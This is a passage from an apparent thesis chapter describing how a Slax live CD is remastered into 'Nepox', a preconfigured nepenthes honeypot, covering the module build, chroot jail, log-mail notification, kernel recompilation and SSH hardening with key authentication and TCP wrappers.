in the following. The description of the remastering process is subject of Section 4.3.3.
Module
001-core
002-apps
003-network
004-xorg
005-xapdeps
006-kde
007-kdeapps
008-office
009-devel
Description
Base system with essential hardware drivers, libraries, and
console applications for administrative purposes
Extends the core module and provides a collection of popular
services and applications, e.g., the Common Unix Printing
System (CUPS), the Gnu Awk (GAWK) text processor, and
the OpenSSL libraries to support cryptographic functions
Collection of network-related daemons and applications, for
example, the bind DNS server, a basic Internet browser, multiple network monitoring tools, and utilities for remote connection
Libraries for the graphical desktop environment
Extends the xorg module and stores additional libraries for
the graphical desktop environment
Provides the K Desktop Environment (KDE), a graphical user
interface, and basic multimedia applications
Extends the KDE session manager with various multimedia
applications such as K3b, a CD recording utility
Basic office and text processing applications
Stores multiple applications for software development, including the Gnu Compiler Collection (GCC) and the Linux kernel
headers
Table 4.6: Base Modules Included in the Slax Live CD
4.3.2 Project Specifications for the Live CD
The central component of our Live CD is formed by a pre-configured honeypot. More
precisely, we favor a low-interaction variant, mainly because of two reasons: First, a
low-interaction honeypot imposes a comparatively smaller level of complexity on the
system administrator. Thus, it can be quickly set up and is easy to maintain as we
have explained in Chapter 2. Second, one of the primary objectives of this project is
50
to support the deployment of honeynets with numerous electronic baits within a short
amount of time in order to collect data about malicious activities on a large scale. For
a standardized high-interaction environment, attackers would likely be able to develop
fingerprints of the systems sooner or later and circumvent the decoys in the future (cmp.
Honeynet Project, 2004b). This would render the CD ineffective. That is why highinteraction honeypots are not applicable in our case.
To integrate the honeypot with our Live CD, we develop a separate file system module which is automatically loaded when the operating system is started. The module
contains the core honeypot files, its system dependencies, and various scripts for configuration and administrative purposes.
Concerning the low-interaction honeypot, we choose to implement nepenthes that we
have already introduced in a previous chapter of this thesis. Nepenthes runs stable and
can be set up without problems. Additionally, its hardware requirements are moderate.
It consumes only small amounts of memory and is highly scalable (cmp. Bächer et al.,
2006). These characteristics make nepenthes well-suited for our needs.
To guarantee the integrity and safety of the CD, we execute the honeypot within a
secured environment, a so-called jail, which makes it difficult to break out of. Even if
adversaries succeed in compromising the decoy, their access is restricted to certain files
and directories, but they cannot modify substantial parts of the disk.
Another challenge that we must cope with is the volatile environment of the Live CD:
When the system crashes or is accidentally rebooted, all results of our research are lost,
because data is solely stored in memory. We can solve this problem by sending captured
malware as well as information about threats and intrusions to a central server on the Internet. The server is responsible for creating backups of our files and generating reports
about the behavior of the malicious software coming in. Thereby, security professionals
ideally need to analyze the status of only this machine on a regular basis. On the contrary, once started, the Live CD-based honeypot is supposed to collect incident-related
data without further, significant manual intervention. However, in case administrators
have to reconfigure certain parts of the system, they should be able to log in locally or
remotely over an encrypted network connection at any time.
The core functionality of the Live CD as well as the co-operation with the central
server is shown in Figure 4.5, the implementation of the individual software parts is
illustrated in the next section.
51
Figure 4.5: Functionality of the Live CD-Based Honeypot
52
4.3.3 Illustration of the Remastering Process of the Live CD
4.3.3.1 Preparing the System Environment
In order to develop our own Live CD, we must make substantial modifications to the
base modules that are provided with Slax (cmp. Table 4.6). For this reason, we need
to copy the compressed modules to a persistent hard disk partition, uncompress the
necessary files, make appropriate changes, and finally burn the new derivative of the
distribution to CD.
To create the persistent system environment, we use a so-called partition editor like
fdisk or cfdisk. The partition editor helps divide a hard disk into smaller, more manageable sections of space (see Dalheimer and Welsh, 2005)13 . With regard to our project
specifications, we add a partition with a size of 1.5 GB: About 800 MB have to be
reserved for the decompressed modules, another 250 MB for the final image of our CD.
The remaining space may be used for file manipulation operations.
In order to store files on the the new partition, we need to build a valid Linux file
system with the help of the mkfs command and mount it into the directory hierarchy
of the operating system. Afterwards, we can recursively copy the CD to hard disk and
extract the base modules using the lzm2dir utility which is part of the Slax Live CD.
This process is illustrated in Line 1 to 18 of Listing 4.1
When all changes are completed, we compile an updated version of the module in
question, compress it with the dir2lzm application (see Line 21) which is also provided
by Slax, and finally overwrite the original instance of the CD. In the last step, we run
the make_iso.sh script to generate a new, bootable image of the distribution that can
be burned to CD as we have already indicated.
The individual actions which are required to remaster the main parts of the Live CD
are summarized in Figure 4.6. As we will see in the following section, we go through a
similar process to build our own honeypot module.
Figure 4.6: Overview about the Remastering Process
13
Note: This reference applies to all system commands and applications that are described in this
section unless otherwise stated.
53
1
2
# c r e a t e t h e f i l e s y s t e m f o r t h e p a r t i t i o n hda2
mkfs -t ext3 / dev / hda2
3
4
5
6
# c r e a t e a mount p o i n t f o r t h e p a r t i t i o n
mkdir / mnt / hda2
mount - rw / dev / hda2 / mnt / hda2
7
8
9
# r e c u r s i v e l y c o p y t h e CD t o h a r d d i s k
cp - rdpv / mnt / live / mnt / hdc / mnt / hda2 / CD
10
11
12
13
# c r e a t e a source d i r e c t o r y f o r th e modules
mkdir / mnt / hda2 / sources
cd / mnt / hda2 / sources ; mkdir 001 - core ; ...; mkdir 009 - devel
14
15
16
17
18
# d e c o m p r e s s t h e b a s e m o d u l e s o f t h e CD
lzm2dir / mnt / hda2 / CD / slax / base /001 - core . lzm 001 - core /
...
lzm2dir / mnt / hda2 / CD / slax / base /009 - devel . lzm 009 - devel /
19
20
21
22
23
24
# a f t e r a l l c h a n g e s h a v e b e e n made , c o m p r e s s t h e new module and
# o v e r w r i t e t h e o r i g i n a l module w i t h t h e u p d a t e d v e r s i o n
dir2lzm 001 - core / 001 - core . lzm
...
dir2lzm 009 - devel / 001 - devel . lzm
25
26
cp *. lzm / mnt / hda2 / CD / slax / base
27
28
29
# c r e a t e an image o f t h e new L i v e CD
/ mnt / hda2 / CD / slax / make_iso . sh
Listing 4.1: Preparation of the System Environment
4.3.3.2 Developing the Honeypot Module
Our honeypot module is composed of three interdependent elements, namely the nepenthes low-interaction honeypot as the core component, the secured system environment, and a couple of scripts that are required for maintaining and configuring the
decoy.
Building the core honeypot files: By default, nepenthes consists of a significant number of vulnerability, shellcode parsing, fetch, submission, and logging modules. The
interaction among these modules has already been described in Chapter 2, a thorough
explanation can also be found in the paper by Bächer et al. (2006). However, it is
important to stress that, particularly, many of the standard vulnerability modules are
quite outdated. For example, the vuln-asn1 module emulates a buffer overrun flaw in
a Mirosoft Windows system library which was published in 2004 (see Microsoft Corporation, 2004b). For this reason, it is questionable whether these types of vulnerabilities
54
are still capable of attracting common malware of today (cmp. Holz, 2008). That is why
we supplement nepenthes with several additional modules that are developed and maintained at the University of Mannheim. They are able to simulate more recent security
weaknesses and, thus, are likely to be targeted by newer and more modern variants of
malicious software. An overview about the custom modules is given in Table 4.7.
Type of Module
Logging Modules
Other Modules
Vulnerability Modules
Description
Logs download and submit events
log-download-privacy and supports the anonymization
of local IP addresses.
Queries a geographical database
to find location-related informalog-geoip
tion about an attacker.
Sends submission-related events
to a central server. Local IP adlog-surfnet-privacy
dresses are sanitized for privacy
purposes.
Mirrors incoming malicious traffic
module-mirror
to simulate a vulnerable system.
Acts as a proxy server for incommodule-proxy
ing malicious traffic.
Emulates an off-by-one remote
buffer overflow vulnerability for
vuln-apache2058
the Apache ModRewrite module.
Emulates a buffer overflow vulnerability for the CA BrightStor
vuln-arcserve
ARCserve Backup.
Emulates a remote buffer overflow
vulnerability for the CA Brightvuln-arcservesql
Stor ARCserve Backup Agent for
SQL.
Emulates a remote format string
vulnerability for the Axigen eMail
vuln-axigen2b
Server 2.0.0b2.
Emulates a remote injection vulvuln-brightstor11520 nerability for the CA BrightStor
Backup 11.5.2.0 application.
vulnerability for the WFTPD and
vuln-chimaeraftp
FreeFTPD FTP server.
Table continues on the following page.
Name of Module
55
Type of Module
Name of Module
vuln-com3tftp
vuln-imail2006
vuln-mailenable1x
vuln-mailenable234
vuln-ms06040
vuln-ms06070
vuln-wftpd323
Description
vulnerability for the 3Com TFTP
server.
Emulates a remote buffer overflow vulnerability for the IpSwitch
IMail 2006 and IMail 8.x mail
server.
vulnerability for the MailEnable
Enterprise 1.04 and MailEnable
Professional 1.54 mail server.
vulnerability for the MailEnable
Enterprise 2.34 mail server.
vulnerability for the Server service of Microsoft Windows.
vulnerability for the Workstation
service of Microsoft Windows.
vulnerability for the WFTPD
3.23 FTP server.
Table 4.7: Custom-Built Modules of the nepenthes Low-Interaction Honeypot
To build the different elements of the honeypot, we have to use various helper tools that
are part of the Gnu Configure and Build System (see Vaughan et al., 2000): The GNU
autoconf14 utility creates a configuration script from a template file for a given source
code package. The script probes the operating system the package will be installed
on for numerous platform-specific features. For instance, it checks the availability of
certain dependency libraries. By doing so, it is verified that all system requirements are
correctly fulfilled.
The default nepenthes source package is already distributed with such a configuration
script and comprises the standard modules. Because our Live CD implements a custombuilt version of the honeypot, we must update this script though. Therefore, we edit
the original template file, add the directory path of our own modules, and execute the
autoreconf command to take the new definitions into account. We must also run
GNU automake15 which, in co-operation with autoconf, generates a so-called global
14
15
see http://www.gnu.org/software/autoconf/
see http://www.gnu.org/software/automake/
56
Makefile. This file is processed by the make command to compile the source code of the
honeypot. By specifiying the DESTDIR parameter and the install argument, we can
finally install the application to a pre-set location. A summary of these operations is
shown in Figure 4.7.
Figure 4.7: Illustration of the
GNU Configure and Build System
Preparing the secured environment: As we have outlined in Section 4.3.2, the honeypot
is to be executed within an isolated, minimized environment, i.e., only a rudimentary set
of functions and operations is being made available. For this reason, we need to supply
nepenthes with all its dependencies, namely the libadns16 , libcap17 , libcurl18 , libmagic19 ,
libpcap20 , libpcre21 , and libprelude22 library. A brief description of these libraries is shown
in Table 4.8. Their source code is prepared and compiled with the configure and make
commands, analogously to the building process of the base honeypot. In the last step,
we separate the program files from other parts of the operating system by invoking
make install with the DESTDIR parameter as described above.
16
see
see
18
see
19
see
20
see
21
see
22
see
17
http://www.chiark.greenend.org.uk/~ian/adns/
ftp://ftp.kernel.org/pub/linux/libs/security/linux-privs/kernel-2.6/
http://curl.haxx.se/
http://packages.debian.org/unstable/libdevel/libmagic-dev
http://www.tcpdump.org/
http://www.pcre.org/
http://www.prelude-ids.com/en/development/download/
57
Dependency Library
Libadns
Libcap
Libcurl
Libmagic
Libpcap
Libpcre
Libprelude
Description
Libadns is an easy-to-use, asynchronous-capable DNS resolver
that translates domain names into IP addresses.
This library enables nepenthes to use the POSIX 1e capability
support that is built into the Linux kernel (see Trümper, 1999).
With so-called Access Control Lists (ACLs), it is possible to
have fine-grained control over the privileges of a file.
These libraries are used for downloading malicious files over
HTTP and FTP.
Libmagic determines the type of a file based on a magic number or a string that is found in the file.
The Libpcap library offers a high level interface for capturing
network packets.
The Libpcre library is a set of functions for pattern matching
with Perl-compatible regular expressions.
Libprelude is a supportive library for the hybrid intrusion
detection framework Prelude that enables different security
applications to report to a central system. In order to use this
function, nepenthes must be configured and compiled with the
option --enable-prelude.
Table 4.8: Dependency Libraries Required for the nepenthes Low-Interaction Honeypot
Building the secured environment: When all operations are finished, we copy the
generated package trees to a single directory. This directory serves as a foundation for
the secured zone which can later be set up easily with the chroot command. By invoking
chroot, a pseudo root directory is created (see Flenov, 2005). As a consequence, files
that are stored in upper layers of the directory hierarchy cannot be accessed any longer,
because the created environment appears to be the top node of a virtual file system
(cmp. also Friedl, 2002; Burr, 2002). Thereby, applications that are executed with nonsuperuser privileges within the chrooted directory, are held captive in a tightly bound
jail.
To permit proper operations, the jail encloses the bash (Bourne-Again Shell) command
interpreter as well as binaries to list the contents of files and directories, e.g., the cd and
ls commands. These utilities, in turn, make use of additional software components, for
example the general libc library which defines basic system calls and functions for the C
programming language the executables are written in. The dependencies must be copied
to the appropriate branches in the directory hierarchy. The ldd command is of great
help to find the correct path of the auxiliary files. In the last step, we run ldconfig, an
administrative tool for rebuilding the cache of the runtime linker. Thereby, all shared
libraries can be found when a program is launched.
58
In order to successfully invoke the honeypot within our secured zone, we must make a
number of further changes: First, we have to add the /tmp directory with global access
permissions to permit temporary operations. Additionally, the /var/log directory must
be created in order to enable logging activities. Second, we generate the world-readable
passwd and group files in the etc directory of our jail. These files store authenticationrelated information about legitimate users and groups of the system and are required
by nepenthes. A typical line in the passwd file is printed below. The entry defines the
superuser account with a user and group identification number of 0, the home directory,
and the command shell to be used. The x in the second column refers to a so-called
shadow file which usually contains the encrypted system passwords. However, as we do
not perform any login operations within the isolated environment, the shadow file is
omitted for security reasons.
root : x :0:0::/ root :/ bin / bash
Third and last, we set up a device special file /dev/null with the mknod command.
The file accepts arbitrary input flows but does not produce any corresponding output
streams (cmp. Dalheimer and Welsh, 2005). As we will see later, this characteristic is
extremely beneficial to discard unwanted error and notifying messages from our scripts.
Once all modifications are completed, the jail has a structure as shown in Figure 4.8.
It is similar to the original directory tree of the operating system even though the number
of applications provided is significantly smaller. To start nepenthes within the secured
environment, we execute the chroot command as follows:
chroot . bin / bash -c [ path to nepenthes ] -u < user > -g < group >
The decoy is then initialized with full access permissions by the bash command interpreter. This operation is necessary to permit emulating services that bind to the
well-known ports (cmp. Internet Assigned Numbers Authority (IANA), 2008), i.e., ports
with registered numbers less than 1024. An example of an emulated service that binds to
a well known port is defined in the Apache module of nepenthes. The module simulates
an HTTP server and listens on port 80.
Services running on the registered and private ports (i.e., higher than 1024) may be
executed with a non-privileged user account for security reasons. The username and
corresponding group can be specified the -u and -g options.
Developing the maintenance and configuration scripts: To facilitate the configuration
of the honeypot, we develop a graphical interface that allows to enable or disable individual modules as well as edit specific program settings. All modifications are taken
into effect when nepenthes is restarted.
59
Figure 4.8: Directory Structure of the Secured Live CD Environment
The graphical interface is based on the dialog package23 which is maintained by Vincent Stemen. The dialog application is called from within a shell script. By specifiying
different command line parameters, we are able to display various interactive elements
such as message boxes, checklists, or text fields. Input and output operations are redirected to the system console. That is why, it is possible to perform administrative tasks
locally as well as over a non-graphical, remote network connection.
When our shell script is launched, a menu with different selection options is shown.
The user may then, for instance, choose to view the list of activated vulnerability modules (see Figure 4.9(a)). This list and other program variables are stored in the main
nepenthes configuration file. A module-related entry in the configuration file is divided
into three sections and consists of the module name, the name of a module-specific dependency file, and another parameter which is usually left empty. For example, the
configurational directive for the Sub7 trojan backdoor24 refers to the vulnsub7.so module and a dependent vuln-sub7.conf file.
23
24
see http://hightek.org/dialog/
see http://www.sub7legends.com/
60
Since other modules are described in a similar fashion, we are able to define a regular
expression which helps find standardized text patterns quickly(see Friedl, 2006, for a
complete overview about regular expressions). Regular expressions are supported by
many programming languages, e.g., awk 25 which is already included on the Slax Live
CD and may thus be easily integrated into our distribution.
With the help of a simple awk program, we extract the relevant text fractions from
the main configuration file and temporarily save the results in memory. Other potential
inter-process messages that are returned by the command shell are discarded through
redirection to the device special file /dev/null as we have explained above. Thus, the
execution of the awk script is completely transparent to the user.
When the operation is finished, the temporarily stored data is read in, and the status
of the different modules is displayed within a new dialog window. The user may then
interactively enable or disable specific components of the honeypot. After all changes
have been made, the list of selected modules is returned. The program settings are then
updated with sed26 , a second helper utility which is capable of editing specific sections
of a file (see Dougherty and Robbins, 1997).
To deactivate a certain module, we write a basic sed instruction and simply insert
two leading slashes (//) before the respective entry in the configuration file. As a
consequence, the string is interpreted as a user comment and gets ignored when the file
is parsed at the start of nepenthes. To reactivate a module, the comment characters are
removed, and the original entry is restored. An extract of the corresponding shell script
which illustrates the interaction with awk and sed is printed in Appendix A.
Our graphical interface also permits modifying module-related program parameters of
the honeypot. For this purpose, we list the individual configuration files in a separate
file selection dialog (see Figure 4.9(b)). When a choice is made, the specific file is
linked with an external editor, and the user has the possibility of manually updating the
program options. For example, in order to change the Internet address of the central
server malicious binaries will be sent to, the file submit-norman.conf is automatically
opened.
Building the entire honeypot module: The configuration script, the core honeypot
package, and its dependencies are finally compressed with the dir2lzm command to
create a new Live CD module as we have outlined in the previous section. The generated
module is then copied to the base directory of the distribution so it is loaded at system
startup. Afterwards, nepenthes can be launched over the default desktop manager and
commence collecting data about threats and intrusions. For this purpose, we need to
adapt the graphical user interface of the operating system. This process is explained
in Section 4.3.3.7. Users are also to be automatically informed about honeypot-related
events on a regular basis. For this reason, we also implement a notification system on
the Live CD. The architecture of this system is subject of the next section.
25
26
see http://www.gnu.org/software/gawk/gawk.html and Dougherty and Robbins (cmp. 1997)
see http://www.gnu.org/software/sed/
61
(a) Module Selection Dialog for
Activating/Deactivating the Vulnerability Modules
(b) File Selection Dialog for Editing a
Configuration File
Figure 4.9: Honeypot Configuration Interface of the Live CD
4.3.3.3 Implementing the Notification System
Once the nepenthes honeypot is started, it generates a significant amount of information
about threats and malicious activities with the help of several logging modules (cmp.
previous section). For instance, whenever a compromise is detected and a piece of
malicious software is successfully captured, this event is written to a special file which is
stored in the var/log folder of the application directory. However, when data is collected
simultaneously on multiple machines, analyzing each device can be time consuming.
For this reason, we set up an automated notification system in order to decrease the
maintenance effort for system administrators and security professionals. Aggregated
status reports for the individual decoys can then be received on a daily basis.
The architecture of the notification system is based upon three components, namely
the logrotate utility, the mailx program, and the Postfix server. These components are
briefly described in the following.
The logrotate utility27 by Erik Troan and Preston Brown is already included in the
original Slax distribution and permits “rotation, compression, removal, and mailing of
log files” (see Troan and Brown, 2002). Due to these features, we are able to automatically process messages that are generated by nepenthes within a given time interval. For this purpose, we define various directives in the main configuration file
/etc/logrotate.conf. For example, to add a timestamp to each of the relevant log
files, we specify the dateext directive (see also Ducea, 2006; Sharma, 2005). Additionally, we implement definitions to create a daily archive of all files. The archive is
compressed in order to save space on the Live CD.
27
see https://fedorahosted.org/logrotate/wiki
62
Figure 4.10: Architecture of the Notification System on the Live CD
In the next step, the compressed archive is passed to the mailx program. As the
name suggests, mailx28 is a simple tool for sending and receiving mail. It is maintained
by Gunnar Ritter. One of its major advantages is its capability to be either executed
interactively or entirely through a script by specifying a number of command line arguments. Therefore, we are able to compose an automated message and inform users
about honeypot-related incidents, while sending the archive with the nepenthes log files
as an attachment.
The actual delivery of the message is performed by a Postfix server29 which is implemented as an independent mail transfer agent (MTA) on the CD. In comparison to
other MTAs such as Sendmail30 , Postfix is particularly reliable, robust, and secure while
being easy to use (cmp. Dent, 2002). These characteristics make Postfix well-suited for
a security-sensitive environment. A summary of the cooperation between the different
components is illustrated in Figure 4.10.
In the following sections, we explain the remastering and customization activities for
other major components of the Live CD, including the boot loader and the system kernel.
The chronological order of the description is in accordance with the boot sequence of
the distribution that we have described in Section 4.3.1.1 (see also Figure 4.3).
4.3.3.4 Adapting the Boot Loader
As we have already explained, the central task of a boot loader is to invoke the kernel of
the operating system after the machine has been started. The Slax Live CD implements
the Isolinux31 boot loader by H. Peter Anvin. It is open source, free of charge, and
28
see
see
30
see
31
see
29
http://sourceforge.net/projects/nail/
http://www.postfix.org/
http://www.sendmail.org/
http://syslinux.zytor.com/iso.php
63
1
2
3
4
5
LABEL xconf
MENU LABEL Nepox Graphics mode ( KDE )
KERNEL / boot / vmlinuz
APPEND vga =769 initrd =/ boot / initrd . gz ramdisk_size =6666 root =/ dev / ram0
rw passwd = ask autoexec = xconf ; kdm
Listing 4.2: Sample Boot Label of the Isolinux Boot Loader
fully compatible with the El Torito format specification which is required to launch the
distribution from CD. For our purposes, Isolinux only needs to be slightly adapted.
First, the package of the boot loader is saved to a directory in the boot folder of the
Live CD. It contains an isolinux.cfg configuration file which is processed at system
startup. The configuration file includes a number of boot labels the user may select
from. A boot label typically comprises the path to the kernel as well as additional boot
options that are passed to the core services for further initializing operations. Due to
those options, multiple system profiles may be created. For instance, it is possible to
specify different video modes in order to support machines with limited screen resolution
capabilities.
A sample label is shown in Listing 4.2. As can be seen in Line 4, the different boot
options are defined in a separate APPEND section. One of the most important options is
initrd. It determines the location and size of the initial ram disk which is responsible
for storing several key applications as we have briefly described in Section 4.3.1.1.
With the help of the passwd parameter the user may be prompted to change the default
password when the operating system is loaded. We include this parameter for security
purposes, because users are free to login remotely over the Internet for maintenance
reasons. A description of the remaining boot options as well as all other valid boot
declarations can be found in Appendix B.
4.3.3.5 Compiling the System Kernel
The name and boot picture of the original Slax distribution is deeply rooted in the core
of the operating system. To replace the existing information and display our own logo
at startup, we need to recompile the system kernel. This operation, however, cannot be
directly performed from within the Live CD, because only a reduced set of the necessary
source files are provided in order to save disk space. For this reason, recompilation must
be invoked on a full-featured operating system. We recommend to install Slackware, as
it is the parent distribution of Slax (cmp. Section 4.1). We must then obtain the kernel
files and the archives of the SquashFS and aufs file systems. As we have described in
Section 4.3.1.2, SquashFS and aufs are used to store data in a compressed format as well
as permit write operations during runtime. They are required to build a proper Live
CD and must therefore be integrated into the kernel.
The author of Slax maintains a web server where all required packages may be down-
64
# create a valid logo f i l e
pngtopam logo . png | pnmquant 223 | pnmtopnm - plain > logo_linux_ \
clut224 . ppm
# copy t h e l o g o to t h e d i r e c t o r y o f t h e k e r n e l s o u r c e s
cp l og o_ li nu x_ cl ut 22 4 . ppm / usr / src / linux - ‘ uname -r ‘/ drivers / video / logo /
Listing 4.3: Creating a Kernel Logo for the Live CD
loaded32 . These packages must be extracted to the /usr/src/ directory where the core
sources of the operating system are stored in. To build a new, adapted version of the
kernel for our Live CD, the following steps have to be carried out (cmp. Kroah-Hartman,
2006): First, a valid kernel configuration file must be created, either from scratch, from a
default configuration file, or taken from a distribution release. The configuration file contains instructions on whether specific drivers or other architectural objects are excluded
entirely from the compilation process, directly compiled in the core, or provided as loadable kernel modules (LKMs). A loadable kernel module can be dynamically attached
or detached during runtime without needing to reboot the system. This characteristic
is a major advantage, because it offers a great deal of flexibility and enables to quickly
modify the current hardware profile. Furthermore, a module is completely unloaded
from memory and does not occupy space any longer when asked to detach, in contrast
to elements of the base kernel that must always reside in memory even when idle. That
is why it is generally proposed to build kernel components modularly where feasible and
keep the size of the core system as small as possible (see Henderson, 2006).
A complete list with the individual compilation decisions is also available on the web
server of the Slax distributor. This list forms a good basis for our own kernel definitions.
To create the final configuration file, the list must be renamed to .config and copied
to the directory of the core sources. Afterwards, we simply run the oldconfig and
make prepare command to initialize the recompilation process.
In the second step, we integrate our own custom boot logo into the kernel. It is
composed of a picture of the nepenthes carnivorous plant as well as the name that we
have chosen for our Live CD, Nepox, an acronym for nepenthes out of the box.
The input source for the logo can be any graphical format, but it must be converted
to a so-called portable pixel map (PPM) with less than 224 colors (cmp. logo linux.h as
defined by the Linux Kernel Organization, 2008). Conversion can be easily done with
netpbm33 , an image manipulation toolkit by Bryan Henderson which is open source and
free of charge. In Listing 4.3, sample commands for creating a logo from a PNG (portable
graphics network) file are shown.
After specifying the boot picture for our Live CD, we are able to compile the loadable kernel modules and the core components with the make command as illustrated in
32
33
see ftp://ftp.slax.org/source/slax/kernel/
see http://netpbm.sourceforge.net/
65
# c r e a t e a t e m p o r a r y d i r e c t o r y f o r t h e new k e r n e l
KERNEL =/ tmp / ‘ uname -r ‘
mkdir -p $KERNEL
# change to the d i r e c t o r y of the k e r n e l sou rce s
cd / usr / src / linux - ‘ uname -r ‘/
# c o m p i l e and i n s t a l l t h e l o a d a b l e k e r n e l m o d u l e s i n t h e d i r e c t o r y
# of the system k e r n e l
make -j 4 modules
INSTALL_MOD_PATH = $KERNEL make modules_install
# c r e a t e a c o m p r e s s e d k e r n e l image
make -j 4 bzImage
# s a v e t h e k e r n e l c o n f i g u r a t i o n and t h e k e r n e l image t o t h e
# d i r e c t o r y o f t h e new k e r n e l
mkdir -p $KERNEL / boot
cp . config $KERNEL / boot
cp arch / i386 / boot / bzImage $KERNEL / boot / vmlinuz
Listing 4.4: Compiling the Kernel for the Live CD
Listing 4.4. The file system modules for SquashFS and aufs are not part of the kernel
configuration and must therefore be built separately (see also Lougher and Okajima,
2008).
In the next step, we need to transfer all created files to our distribution. However, even
though all dependencies are now included in the Live CD, the system is not functional
yet. We still have to update the initial ram disk which is run at system startup and
integrates support for the basic file systems as well as the core drivers. Performing this
operation manually is error-prone because many files must be copied individually (cmp.
Jones, 2006b). For this reason, the author of Slax has published a free collection of
scripts, the so-called Linux Live scripts, to facilitate this process (see Matejicek, 2008b).
The script generates a valid ram disk which must be saved to the boot directory of the
CD. Afterwards, we only have to mount the disk temporarily and edit the linuxrc start
file to adapt the system messages to our needs. Mounting requires use of a so-called
loopback file interface. With the help of this interface, we are able to access the file
system within the ram disk as a regular file. When all changes are made, the disk can
be unmouted and compressed again as described in Listing 4.5.
At last, we run the make_iso.sh command to build an image of the distribution with
the new kernel and system components. A summary of the entire recompilation process
is given in Figure 4.11. The development of the Live CD core is now completed. In the
remaining sections, we illustrate customization operations to enhance the security and
user friendliness of the CD.
66
# c r e a t e a temporary d i r e c t o r y f o r the
mkdir ramdisk
i n i t i a l ram d i s k
# c o p y and u n c o m p r e s s t h e i n i t i a l ram d i s k
cp / boot / initrd . gz . && gunzip initrd . gz
# mount t h e i n i t i a l ram d i s k t o t h e l o o p b a c k
mount -t ext2 -o loop initrd ramdisk /
# adapt the l i n u x r c s t a r t
...
file
interface
file
# u p d a t e and c o m p r e s s t h e i n i t i a l ram d i s k
umount ramdisk / && gzip -9 initrd
Listing 4.5: Mounting the Initial Ram to Adapt the linuxrc Start File
Figure 4.11: Overview about the Recompilation Process of the Kernel
67
4.3.3.6 Hardening the System Environment
One of the major challenges of the Live CD is to ensure the safety and integrity of the
underlying operating system. This means, while it must be possible to compromise the
emulated services of the honeypot, all other resources must be protected against attacks
at all times.
Preventing illegitimate access, data modification, or deletion requires a process which
is known as system hardening. It involves measures on the network as well as on the
physical layer (cmp. Turnbull, 2005). In this section, however, we only cover networkrelated aspects. For more information on securing the physical level, please refer to the
draft by the National Institute of Standards and Technology (1996).
Our system protection scheme is twofold: First, we shutdown all programs that are not
vitally important at startup in order to minimize the number of potential entry points
and vulnerabilities. As our Live CD is supposed to work as a single, independent data
collection device, this includes network sharing and network connection applications.
Second, we propose improving the authentication procedure for the SSH remote administration server and use so-called wrappers to limit access solely to certain IP addresses
and ranges.
Reducing the number of started services: Generally, services on the Live CD are started
by initialization scripts that are stored in the etc/rc.d/ directory. As we have briefly
explained in Section 4.3.1.1, these scripts are invoked by an init master process when
the computer boots up and depend on a specific run level (see also Brockmeier, 2001).
A run level determines the state the system is in, the provided functionality, and the
mode of operation. At any given time, the state of the machine reflects one of the levels
listed in Table 4.9.
To disable a service, it is sufficient to revoke the execution permissions from its initialization script. Thereby, the application is not loaded when the operating system is
launched and does not get bound to a network port. For example, to prevent the Unix
Common Printing System (CUPS) from being executed at boot time, we change the
Run Level
0
1
2
3
4
5
6
Description
System halt
Single user mode
Not defined
Multiuser mode with networking enabled and console login
Multiuser mode with networking enabled and graphical desktop manager
Not defined
System reboot
Table 4.9: Overview about the Run Levels of the Operating System
(Source: Based on Brockmeier, 2001)
68
access rights of the initialization script with the chmod command and the parameter -x
as follows:
chmod -x / etc / rc . d / rc . cups
Further candidates for removal may be identified with netstat, a utility for displaying
all running network applications. It is already part of the original Slax distribution.
Repeating the chmod command for the initialization scripts of the services in question,
we sequentially exclude all unneeded programs except the Postfix and SSH server from
the boot sequence. Thus, we effectively reduce the attack surface of our Live CD to two
system components.
Improving the authentication mechanism for the SSH server: Even though the SSH
server strongly facilitates remote maintenance of the distribution, the password-based
login mechanism of the service still forms a possible weak spot. For instance, by generating a large dictionary of common words, names, and phrases, an attacker may be able
to successfully guess the authentication credentials, login, and compromise the system.
For this reason, we suggest not to rely only on the strength of the chosen password but
also verify the identify of the user with an additional security token. The security token
can be implemented as a combination of private and public keys. The public key can
be freely distributed and is stored in a special directory on the CD. The corresponding
private key is protected with a password and strictly remains with the user. To login, the
correct password must be entered, and the location of the private key must be specified.
Thus, the authentication process is based on two factors, and access is granted if, and
only if both these factors are fulfilled. In turn, if an intruder does not possess the private
key or does not know the matching password, authentication fails, and access is rejected.
An illustration of this process is shown in Figure 4.12, a more thorough explanation is
given by Schneier (1996).
To generate a valid key pair, we simply run the ssh-keygen command. The created
public key must then be copied to the authorized_keys file in the .ssh/ directory of
the system user. The private key must be transferred to a trusted machine and has to be
kept in secret. In the last step, we update the configuration file /etc/ssh/sshd_config
of the SSH service to accept public key identification requests and reject password-only
logins (cmp. Mates, 2008). After restarting the server, the two-factor authentication
functionality is enabled.
69
Figure 4.12: Two-Factor Authentication Process
of the SSH Remote Administration Service
Using TCP wrappers for access control: In order to impede illegitimate access to our
CD, we can also make use of the TCP wrapper support the SSH remote maintenance
application is compiled with. A TCP wrapper is a host-based network filter for system
services (see Venema, 1992). In dependence of a simple access control list (ACL), communication requests with a service are either accepted or denied. The access control
list is defined by two files, hosts.allow and hosts.deny, that are stored in the main
configuration directory of the distribution. For security purposes, we recommend creating access rules according to a whitelist, i.e., we only permit connections from specific
machines while rejecting traffic from all others. A sample configuration for hosts within
the subnet 192.168.1.0/24 is illustrated in Listing 4.6. As can be seen, wrappers, in
cooperation with two-factor authentication, may thus add another layer of protection
against attacks.
/ etc / hosts . allow :
# a c c e p t c o n n e c t i o n s from t h e s u b n e t 1 9 2 . 1 6 8 . 1 . 0 / 2 4
sshd : 1 9 2 . 1 6 8 . 1 . 0 / 2 5 5 . 2 5 5 . 2 5 5 . 0
/ etc / hosts . deny :
# r e j e c t r e q u e s t s from a l l o t h e r m a c h i n e s
sshd : ALL
Listing 4.6: Example of a TCP Wrapper Configuration
70
4.3.3.7 Customizing the Graphical User Interface
We have already pointed out that the usability and user friendliness of our Live CD are
important criteria for system administrators and security professionals in order to carry
out maintenance tasks quickly and focus on data collection and data analysis activities.
For this reason, all honeypot and system functions are to be configured and executed
within a graphical user interface.
The original Slax distribution implements the K Desktop Environment (KDE) which
is both reliable and stable. However, in its default configuration, KDE offers many
functions that are not strictly required for our needs, for instance, multimedia playing
capabilities. Consequently, we have to customize the existing environment and remove
all dispensable components to make the user interface as intuitive as possible. Furthermore, we change many visual elements and system settings to create a unique and
distinguishable look of our Live CD. For example, we add desktop icons and submenu
entries to permit easy access to the honeypot module. We also adapt the desktop wallpaper, the appearance of the login and logoff screen, and the system color palette. As
these operations involve modifying a large number of files and options, a complete and
detailed presentation of all changes would not be beneficial. Thus, we rather describe
the architecture of the KDE platform from a more abstract point of view for a better
